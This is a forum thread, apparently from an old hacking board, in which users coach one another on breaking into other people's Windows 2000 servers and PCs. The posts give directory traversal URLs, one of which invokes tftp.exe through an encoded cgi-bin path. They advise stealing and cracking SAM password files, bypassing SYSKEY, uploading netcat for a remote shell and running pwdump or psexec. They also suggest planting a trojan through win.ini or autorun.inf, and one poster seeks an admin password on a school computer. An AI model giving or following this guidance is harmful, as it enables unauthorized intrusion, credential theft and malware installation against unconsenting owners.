LEt's say that I have access to machine, so I can get any file I want as ong as I know where it is located.. Example 127.0.0.1/../../../../../winnt/win.ini
Offcourse, this file has no use to me whatsoever to get a shell, or admin passes or anything relevant... So can you suggest what file I would have to get to gain any of that.?
Thanks..

well i`d get the SAM file from system32/config/ and try to read out the passes with L0pht.....google for SAM cracking or somethin and you`ll find enough about that (i think sam files exist only on nt/xp/2000

moved to the windows forum...
Please post to the correct forum next time.

You cant get the SAM when machine is running... perhaps you can try to get the /winnt/repair/SAM file, and you will try to pass it to LC4... if you are a luky man you will get the administrator password when the system was installed.

.... or the reapair disk was made

If you can place rdisk.exe with a switch that I can't remember (maybe -y?) in the startup directory, it will update the repair copy of sam._ the next time it reboots. Used to copy cmd.exe to the scripts directory on IIS boxes and run rdisk from a browser.

Well, the bug looks like this http://123.123.123.123/../../../../../winnt/win.ini and that way I can read any file or dir, and I got SAM repair file but LC4 couldn't do shit about cracking it... Maybe there is a way to fire a command line tftp or something?

Don't forget that SAM files are only on the OS Windows 2000. Thats all i know of, but since Windows 2k was baced off of NT and both have nfts partiton Nt may also use SAM files.

There's alot of information missing..

Is this a domain controller, member server in a domain, stand alone server, or workstation?

Can you access only through port 80 using directory traversal?
What account are you logged-in with?

There's many ways to go about getting what you need but some depend on what is open and what is not.

Are you limited in outbound connections?

if you can execute using directory traversal and have the appropriate rights, you should easily be able to tftp and run pwdump to pull all the accounts in active directory if it's a windows 2000 DC system using AD.

If you aren't restricted on outbound ports upload netcat and push a shell to yourself. If it's a win2k system install terminal services remotely, install LC on it, and pull accounts from the registry.

Use psexec if netbios is open? Create your own account if you don't have one.

There's many ways to do it, it all depends on what is open to access

Wow, this is nice post.. You have answer me even the things I was about to ask in the future..
But seriously now. I can access only through IE on port 80... So I don't know if TFTP will work because if I type in /../../winnt/tftp.exe I will get a download alert I suppose.. OK, the important thing is that I can only enter via port 80 in IE...
And here is another question.. About different server.. I have access only to TFTP server.. So I can download and upload anything, but cannot execute it... SO I thought of downloading his win.ini and add some startup method for my trojan, and then upload both updated win.ini and trojan and wait for him to restart...
BTW, is there a way I can make server reboot remotely... It is Win2k/nt ussually..

it is a apache server or IIS or something other ? Cause with apache or with IIS Directory Traversal you can get your files on the server with tftp ( both ) or ftp echo script ( IIS only ) .

And you can execute your file direct and not so complicated . As many people over this post said , give us more information plz

OK, both computers are Win2000... First one is IIS server and the second one is personal computer on DSL(some custom webserver installed)...
1st: There is no open relevant ports so there is no other way than this only bug it has that let's me directory traversal. I can't remeber what software it has that is vulnaruble but it let's me browse his file when I enter this http://123.123.123.123:8888/surf/.../.../...../.../.../winnt
So the only thing I can do is read any file I guess.. maybe open up a shell if it has anything to do with IIS unicode bugs, but don't know, so I will let you tell me..

2nd: This one has TFTP service enabled, so I can only upload or download any file, but have no way to execute it again... It has serv-u server started too, but no anonymous logins accepted.. He has a webserver installed, but I don't know which one... When I scann him, it says that the webserver type is MyHTTP server, so who knows what software he uses.... SO he has webpage running on port 80 too..

LC4 probably couldn't do anything with the SAM repair file bcause it has syskey enabled. Search the board for a SYSKey tool

Yeah, it didn't do anything with repar file... I found one SYSKEY software, but it is a shareware.. Any other, better?
One more thing, any way to get the SAM file from config?

Can you execute in any web directory like inetpub scripts?
If you can find an executable directory, upload a file to it and call it via IE.
Can you change his web files?

What account are you running under? Try changing directories into the administrators profile. If you can traverse into that, then you place something in his startup.

Like, I said, I can only READ, and if I try to READ an EXE file, I will get a download prompt..
I can also read http://HISIP:8888/surf/.../.../.../.../......ub/AdminScripts

There are some vbs files listed then...

With no execute, that sucks.

You made some mention about being able to upload via tftp. Is there any active content in his web pages?

Maybe it's possible to overwrite his web files with a edited set from you?

TFTP is for the other vulnaruble server.... Yes, I could probably owerwrite his web files, if I knew the exact path to index.html.. Which I don't..
I decided to try two things:
1. update his win.ini or system.ini with my trojan startyup information, and then upload both updated win.ini and trojan server...
2. upload my trojan server and autorun.inf into root of c:\ and wait for him to come browsing his hard drive...

i have a problem this is an apache 2.0.39 vulnerablility
and i have a problem here is my directory transversal

http://ip/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e...t+c:\j.txt

what is wrong with this cause it doesn't work,i get the result

Error message:
Premature end of script headers: C:/WINNT/system32/tftp.exe

you wanna hack JANA webserver, um?


guess what...all the little iis tricks won't work :\

no its Apache 2.0.39

i, at my school have an xp pro italian with 3 accounts:

Alunno (student is the translation) - limited
Docente (teacher is the translation) - less limited , like a poweruser but less
Administrator (no need of translation) - admin

Alunno and Docente are blank passwords
Admin has a password syskeyed. I must recover the password for admin cuz i before accessed admin and i have documents in admin's efs folder

i must do it in windows cuz my teacher monitors me and in a fast way(i don't need to crack the passwords there. i need to de-syskey and save to a floppy the passwords.
i will crack it to my home)

there is a system (i have lc4 but i can't install it at school cuz i've limited privileges)

i need it

We are all assuming that he's not using good 'ol Win98/95 - whereupon you could just grab the *.pwl files

Anyhow, I posted a while back, about exploiting MS ISA server and Surf Control's Super Scout and what interesting files you could grab through directory traversal.
Passwords for the web-proxy program WILL be stored on that box. You WILL be able to find them. The only issue is how they are encrypted, and whether or not they are in use.

Marcus, resend that as a seperate posting. Then more people'll help!

Is it possible to modd the autoexec.bat to make a copy of the sam file at startup?
copy c:\**\*.sam c:\backup.sam
Ive never tried this but i think its worth a try ...

Most probably it wont work but someone should try it . Also keep a winstart.bat in winnt(or windows) folder and try .